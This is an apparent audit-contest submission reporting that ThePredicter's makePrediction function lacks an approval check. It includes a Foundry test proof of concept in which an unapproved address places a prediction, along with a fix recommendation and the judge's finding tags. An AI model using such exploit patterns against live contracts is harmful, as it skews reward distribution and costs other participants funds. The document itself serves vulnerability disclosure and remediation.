Submission Details
Severity:
Anyone can make Prediction
Details
Only users who have been approved are expected to be able to call ThePredicter::makePrediction; however, there is no restriction on this implying that anyone can call it.
POC
+ address public stranger2 = makeAddr("stranger2");
function test_anyoneCanMakePrediction() public {
vm.startPrank(stranger2);
vm.warp(1);
vm.deal(stranger2, 1 ether);
thePredicter.register{value: 0.04 ether}();
vm.stopPrank();
vm.startPrank(organizer);
vm.warp(2);
thePredicter.approvePlayer(stranger);
vm.stopPrank();
vm.startPrank(stranger2);
thePredicter.makePrediction{value: 0.0001 ether}(
0,
ScoreBoard.Result.Draw
);
vm.stopPrank();
}
Impact
Loss of funds for random users who enter the function
Tools Used
Manual Review
Recommendations
Add a requirement ensuring that the msg.sender is approved; that is Status.approved.
Updates
Lead Judging Commences
NightHawK about 1 year ago
Submission Judgement Published Assigned finding tags:
makePrediction lacks access control
makePrediction has no access controls and any unapproved user can make predictions causing an incorrect calculation and distribution of rewards.
Rewards breakdown
nSLOC
191This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.